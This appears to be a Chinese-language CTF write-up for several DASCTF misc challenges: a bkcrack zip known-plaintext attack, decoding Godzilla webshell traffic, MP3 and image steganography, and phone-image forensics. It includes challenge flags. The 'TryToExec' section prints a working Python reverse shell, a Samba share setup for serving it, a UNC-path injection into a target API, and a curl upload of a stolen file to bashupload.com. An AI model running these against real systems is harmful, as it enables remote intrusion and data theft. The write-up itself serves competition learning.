Misc

签到题喵

winhex打开搜索JPG图片尾FFD9,发现图片尾部一段话,照做就行

take_the_zip_easy

一眼丁真,里面的zip名字叫dasflow.zip,猜测里面的也是dasflow.pcapng,直接用bkcrack进行已知明文攻击,1.txt的内容为dasflow.pcapng

./bkcrack.exe -C zipeasy.zip -c dasflow.zip -p 1.txt -o 30 -x 0 504B0304 >1.log

成功得到密钥

使用密钥即可得到dasflow.zip

./bkcrack.exe -C zipeasy.zip -c dasflow.zip -k 2b7d78f3 0ebcabad a069728c -d dasflow.zip

流量打开一看,根据特征判断是哥斯拉流量,而且导出http可以发现一个被加密的flag压缩包,找到解密所需的东西后就可以用脚本解密

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++){
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$pass='air123';
$payloadName='payload';
$key='d8ea7326e6ec5916';

echo gzdecode(encode(base64_decode('xxx'),$key));

单独看http流,猜测上传flag.zip的前一步是生成zip文件,所以直接解密上传的前一段流量里的加密数据,得到密码

加密后的生成zip命令:J+5pNzMyNmU2mij7dMD/qHMAa1dTUh6rZrUuY2l7eDVot058H+AZShmyrB3w/OdLFa2oeH/jYdeYr09l6fxhLPMsLeAwg8MkGmC+Nbz1+kYvogF0EFH1p/KFEzIcNBVfDaa946G+ynGJob9hH1+WlZFwyP79y4/cvxxKNVw8xP1OZWE3

解密后:cmdLinePsh -c "cd "/var/www/html/upload/";zip -o flag.zip /flag -P airDAS1231qaSW@" 2>&1methodName execCommand

得到密码airDAS1231qaSW@,解开压缩包拿到flag

DASCTF{7892a81d23580e4f3073494db431afc5}

mp3

一眼丁真,尾部一个png,提取一下,是一张只有黑白的图片,zsteg跑一手

好家伙,还有个压缩包,直接提出来

zsteg -E 'b1,r,lsb,xy' 00000646.png > 1.zip

是个损坏的加密压缩包,winrar直接可以修好,于是看看MP3

猜测是MP3stego,试了试发现是空密码

得到压缩包密码:8750d5109208213f

根据文件名,猜一手rot47,得到的东西有点像js,直接在控制台里跑一下

DASCTF{f8097257d699d7fdba7e97a15c4f94b4}

机你太美

拿着新附件直接打开夜神模拟器导入,机子起起来之后发现有PIN密码,于是在网上找了篇文章http://www.360doc.com/content/12/0121/07/37846289_1012985425.shtml,照着做即可消除PIN密码直接进系统

别的没找到很重要的,只有桌面上叫Skred的软件里有不少对话,在里面发送的十几个压缩包以及两张图都可以用取证大师在vmdk里找到

重点在这两张图上,jpg一眼丁真,exif里提示了一个XOR DASCTF

这个暂时没有用,最后才有用,然后是png,细心一点的话可以在alph通道里发现一条线

简单提取下像素

from PIL import Image
width = 1532
height = 961
img=Image.open("41.png")
for i in range(width):
    for j in range(height):
        pi=img.getpixel((i,j))
        if(pi[3] == 255):
            print(1,end='')
        else:
            print(0,end='')

再将得到的输出手动去头去尾,即可得到压缩包密码e01544a9333ef62a3aa27357eb52ea8a

上面的压缩包随便提取了一个,可以成功解密,发现里面是乱码,于是xor DASCTF2022即可得到flag

DASCTF{fe089fecf73daa9dcba9bc385df54605}

TryToExec

  1. 生成exe马
import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('xxx.xxx.xxx.xx',3333));threading.Thread(target=exec,args=("while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)",globals()),daemon=True).start();threading.Thread(target=exec,args=("while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)",globals())).start()

pyinstaller --onefile test.py 编译成exe

  1. vps安装samba共享马

    sudo yum install samba samba-client
    sudo systemctl start smb.service
    firewall-cmd --permanent --zone=public --add-service=samba
    sudo nano /etc/samba/smb.conf
[global] 下面添加这个
acl allow execute always = True

文件尾部加这个
[public]
path = /tmp/a
available = yes
read only = no
browsable = yes
public = yes
writable = yes
guest ok = yes
sudo systemctl restart smb.service
  1. 第一步编译的马 放到/tmp/a/下面 chmod 777

  2. 反弹shell

    GET http://162.14.110.33:15000/api?action=%5C%5Cxxx.xxx.xxx.xx%5Cpublic%5C99.exe

  3. curl bashupload.com -T ..\Th3Th1nsUW4nt.docx

DASCTF{d551c29f6c77a97ecf30fe7a6afda6ce}